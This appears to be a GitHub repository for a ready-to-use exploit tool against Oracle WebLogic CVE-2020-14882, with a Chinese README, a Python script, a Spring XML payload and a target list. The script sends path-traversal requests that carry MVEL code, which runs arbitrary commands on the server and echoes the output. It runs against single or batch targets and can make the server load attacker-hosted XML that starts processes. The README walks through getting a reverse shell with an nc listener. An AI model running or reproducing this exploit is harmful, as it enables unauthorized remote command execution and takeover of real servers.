├── target.txt
├── images
    ├── 1.png
    ├── 2.png
    ├── 3.png
    ├── 4.png
    ├── 5.png
    ├── 6.png
    ├── 7.png
    └── 8.png
├── poc.xml
├── README.md
└── CVE-2020-14882_ALL.py


/target.txt:
--------------------------------------------------------------------------------
1 | http://1.1.1.1:xx
2 | http://1.1.1.1:xx
3 | 


--------------------------------------------------------------------------------
/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/1.png


--------------------------------------------------------------------------------
/images/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/2.png


--------------------------------------------------------------------------------
/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/3.png


--------------------------------------------------------------------------------
/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/4.png


--------------------------------------------------------------------------------
/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/5.png


--------------------------------------------------------------------------------
/images/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/6.png


--------------------------------------------------------------------------------
/images/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/7.png


--------------------------------------------------------------------------------
/images/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_ALL/HEAD/images/8.png


--------------------------------------------------------------------------------
/poc.xml:
--------------------------------------------------------------------------------
 1 | <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
 2 |   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
 3 |     <constructor-arg>
 4 |       <list>
 5 | 	<value>cmd</value>
 6 |       </list>
 7 |     </constructor-arg>
 8 |   </bean>
 9 | </beans>
10 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2020-14882_ALL
 2 | 
 3 | CVE-2020-14882_ALL综合利用工具，支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
 4 | 
 5 | 需要模块：requests、http.client
 6 | 
 7 | **（工具仅用于授权的安全测试，请勿用于非法使用，违规行为与作者无关。）**
 8 | 
 9 | 命令回显模块已知成功版本：12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
10 | 
11 | ### 选项
12 | 
13 | ![](./images/1.png)
14 | 
15 | 
16 | 
17 | ### 功能一：命令回显
18 | 
19 | python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
20 | 
21 | ![](./images/2.png)
22 | 
23 | python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
24 | 
25 | ![](./images/3.png)
26 | 
27 | 
28 | 
29 | ### 功能二：批量命令回显
30 | 
31 | python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
32 | 
33 | target.txt 格式：http://x.x.x.x:xx，一行一个。
34 | 
35 | ![](./images/4.png)
36 | 
37 | 
38 | 
39 | ### 功能三：外置xml文件无回显命令执行
40 | 
41 | 1、Linux反弹shell为例，编辑好poc.xml文件，开启python监听。  
42 | 
43 | ```
44 | <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
45 |   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
46 |     <constructor-arg>
47 |       <list>
48 | 	<value>cmd</value>
49 |       </list>
50 |     </constructor-arg>
51 |   </bean>
52 | </beans>
53 | ```
54 | 
55 | 开启python监听。
56 | 
57 | ![](./images/5.png)
58 | 
59 | nc开启监听。
60 | 
61 | ![](./images/6.png)
62 | 
63 | 2、使用-x选项指定xml文件路径，发送payload。
64 | 
65 | python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
66 | 
67 | ![](./images/7.png)
68 | 
69 | 3、成功接收shell。
70 | 
71 | ![](./images/8.png)
72 | 
73 | 


--------------------------------------------------------------------------------
/CVE-2020-14882_ALL.py:
--------------------------------------------------------------------------------
  1 | #coding:utf-8
  2 | import requests
  3 | import sys
  4 | import argparse
  5 | import http.client
  6 | 
  7 | http.client.HTTPConnection._http_vsn = 10
  8 | http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
  9 | 
 10 | requests.packages.urllib3.disable_warnings()
 11 | 
 12 | 
 13 | #功能1方法：回显命令执行。
 14 | def command(url_cmd,headers_cmd,url):
 15 | 	try:
 16 | 		res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False)
 17 | 		if "<html" not in res.text and "<TITLE" not in res.text :
 18 | 			print ("[+] Command success result:")
 19 | 			print (res.text)
 20 | 
 21 | 		else:
 22 | 			print ("[-] " + url + " not vulnerable or command error!")
 23 | 	except Exception as e:
 24 | 		#print (e)
 25 | 		print ("[-] " + url + " not vulnerable or command error!")
 26 | 
 27 | 
 28 | #功能2方法：无回显，命令执行,适用于Weblogic 10.x、12.x。
 29 | def weblogic_12(url_cmd,post_12,headers_12):
 30 | 	try:
 31 | 		res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False)
 32 | 		#print ("[+] Attack complete!")
 33 | 	except Exception as e:
 34 | 		print ("[+] Attack complete!")
 35 | 
 36 | def main():
 37 | 	banner = """  _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ___  
 38 |  / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \__ \ 
 39 | | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
 40 | | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ < / / 
 41 | | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) / /_ 
 42 |  \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____|
 43 |                                                                                
 44 |                                                          Author:GGyao
 45 |                                                          Github:https://github.com/GGyao
 46 | 
 47 | """
 48 | 
 49 | 	print (banner)
 50 | 	parser = argparse.ArgumentParser()
 51 | 	parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
 52 | 	parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
 53 | 	parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
 54 | 	parser.add_argument("-x", "--xml", help="Remote XML file; Example:http://vpsip/poc.xml; ")
 55 | 	args = parser.parse_args()
 56 | 
 57 | 	#功能1：命令回显。
 58 | 	if args.url != None and args.cmd != None:
 59 | 		url = args.url
 60 | 		url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
 61 | 		headers_cmd = {
 62 | 		'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
 63 | 		'cmd':args.cmd,
 64 | 		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 65 | 		'Content-Type':'application/x-www-form-urlencoded'
 66 | 		}
 67 | 
 68 | 		#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
 69 | 
 70 | 	
 71 | 		#command(url_cmd,post_cmd,headers_cmd,url)
 72 | 		command(url_cmd,headers_cmd,url)
 73 | 
 74 | 	#功能2：weblogic 12.x命令执行。
 75 | 	if args.url != None and args.xml != None:
 76 | 		url_cmd = args.url + '/console/images/%252e%252e/console.portal'
 77 | 		headers_12 = {
 78 | 		'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
 79 | 		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 80 | 		'Content-Type':'application/x-www-form-urlencoded'
 81 | 		}
 82 | 
 83 | 		post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)
 84 | 
 85 | 		weblogic_12(url_cmd,post_12,headers_12)
 86 | 
 87 | 	# 功能3：回显命令执行批量。
 88 | 	if args.file != None and args.cmd != None:
 89 | 		#print (1)
 90 | 		for File  in open(args.file):
 91 | 			File = File.strip()
 92 | 			url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
 93 | 			print ("[*] >>> Test:" + File)
 94 | 
 95 | 			url = File
 96 | 			headers_cmd = {
 97 | 			'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
 98 | 			'cmd':args.cmd,
 99 | 			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
100 | 			'Content-Type':'application/x-www-form-urlencoded'
101 | 			}
102 | 
103 | 
104 | 			#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
105 | 			command(url_cmd,headers_cmd,url)
106 | 
107 | 
108 | if __name__=="__main__":
109 | 	main()
110 | 


--------------------------------------------------------------------------------